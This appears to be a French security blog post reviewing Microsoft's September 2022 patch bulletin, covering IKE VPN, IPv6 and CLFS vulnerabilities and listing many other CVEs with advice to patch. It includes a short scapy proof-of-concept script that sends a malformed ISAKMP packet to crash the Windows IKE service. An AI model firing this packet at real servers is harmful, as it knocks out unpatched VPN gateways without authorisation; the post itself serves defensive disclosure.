Blog: Fortigate CVE-2023-27997 (XORtigate) in the eyes of the owl
Bulletin Microsoft de septembre 2022
Publié le
Exécution de code à distance sur le protocole VPN IKE / CVE-2022-34721 et CVE-2022-34722
Si vous avez un serveur Windows qui agit comme une passerelle VPN IPSec, alors il est vulnérable à 2 exécutions de code à distance, permettant un contrôle total, sans authentification.
Si en plus ce serveur est exposé sur Internet... je pense que vous allez passer un mauvais week-end 😉.
Score CVSS : 9.8/10.
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34721https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34722
En bonus, voici un exploit de non-stabilité qui ne fait que planter le service mais dans quelques heures l'exploit sera de stabilité et exploité dans la nature 😉 : https://github.com/78ResearchLab/PoC/tree/main/ CVE-2022-34721
Le code source de l'exploit :
from scapy.all import *
from scapy.contrib.ikev2 import *
from scapy.layers.isakmp import *
import socket, time
target = ("192.168.159.134", 500)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)
pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")
sock.sendto(raw(pkt), target)
Merci de ne pas le lancer sur des serveurs de production 😄
Élévation des privilèges locaux avec l'API de journalisation (Windows Common Log File System / CLFS) / CVE-2022-37969
Cette API est accessible par toute application souhaitant journaliser des choses et cette vulnérabilité permet d'élever ses privilèges mais uniquement si l'attaquant dispose déjà d'une première exécution de code ou d'une prise de contrôle partielle de la cible (ou est un utilisateur taquin 😅).
La particularité de cette vulnérabilité est qu'elle a été découverte par plusieurs sociétés de sécurité (Mandiant, Zscaler, Crowdstrike) comme étant exploitée dans la nature. Comprendre : leurs clients ont été piratés et cette vulnérabilité a été utilisée par les attaquants pour faire avancer les attaques ou directement dans leurs logiciels malveillants.
Exécution de code à distance sur IPv6 / CVE-2022-34718
Celle-ci est amusante car si vous avez un système Windows avec IPv6 activé (ce qui est le cas par défaut), alors il est possible de vous envoyer un paquet réseau spécialement formaté résultant en une exécution de code, à distance, sans authentification. Et comme IPv6 est au niveau du noyau, c'est une prise de contrôle totale 🎉.
Score CVSS : 9.8/10.
Sauf erreur de ma part, c'est un paquet routable, donc la vulnérabilité semble pouvoir être exploitée sur internet. Après, comprenez Microsoft, IPv6 est récent, il n'est supporté par Microsoft que depuis 20 ans 😜 ! (Depuis Windows XP et surtout XP SP1) https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34718
Autres vulnérabilités
Il existe encore de nombreuses vulnérabilités dont voici quelques unes :
- Exécutions de code dans Visual Studio...protégez vos développeurs 👍(CVE-2022-35777, CVE-2022-35825, CVE-2022-35826, CVE-2022-35827) ;
- Augmentation des privilèges à partir d'Exchange (courrier) ;
- Belle exécution de code à distance sans authentification sur des serveurs Windows servant de passerelle VPN "PPP" (CVE-2022-30133) ;
- Exécution de code à distance sans authentification sur le pilote Bluetooth 😨 . Désactivez le Bluetooth de votre ordinateur par défaut, c'est une bonne pratique (CVE-2022-30144) ;
- Exécution de code à distance sans authentification sur le service de partage de fichiers NFS 😱 (CVE-2022-34715) ;
- Exécution de code à distance sans authentification sur le service de partage de fichiers SMB, à la fois client et serveur 😲 (CVE-2022-35804) ;
- Contournement des restrictions Excel pouvant être utilisées dans le cadre d'un phishing pour aboutir à une exécution de code (CVE-2022-33631) ;
- Une élévation locale des privilèges du service Windows Fax. Oui oui, en 2022, le Fax... (CVE-2022-34690) ;
- D'autres vulnérabilités dans le spouleur d'impression. J'ai perdu le compte mais on a dû passer la vingtième 🤯 (CVE-2022-35755, CVE-2022-35793) ;
- Une évasion de machine virtuelle sur Hyper-V (CVE-2022-34696) ;
- Un contournement de Credential Guard, censé protéger vos mots de passe et condensés de mots de passe en mémoire (CVE-2022-34709) ;
- Un contournement de l'authentification Windows Hello, censée garder votre ordinateur verrouillé 🤦♂️ (CVE-2022-35797) ;
- Le contournement de Secure Boot, censé protéger le démarrage de votre ordinateur (CVE-2022-34301 et CVE-2022-34303) ;
- Et enfin, 16 vulnérabilités dans le navigateur Chromium-Edge.
Enfin
Enfin... il y a des vulnérabilités assez critiques qui doivent être patchées rapidement 😉.
Dernier point amusant, avec ce bulletin, Microsoft corrige sa millième faille de l'année, youhou... bravo... champagne 🍾.
C'est un très bel anniversaire (ironique) pour fêter la publication officielle de la " loi sur la cyber-résilience ". qui obligera les éditeurs à fournir une assistance à la sécurité, des mises à jour de sécurité et une garantie de conformité des produits numériques aux exigences de cybersécurité tout au long de leur cycle de vie. Mais c'est un autre sujet dont nous reparlerons😉 : https:// twitter.com/MaliciaRogue/status/1570366397737222144.
Bonne chance 👍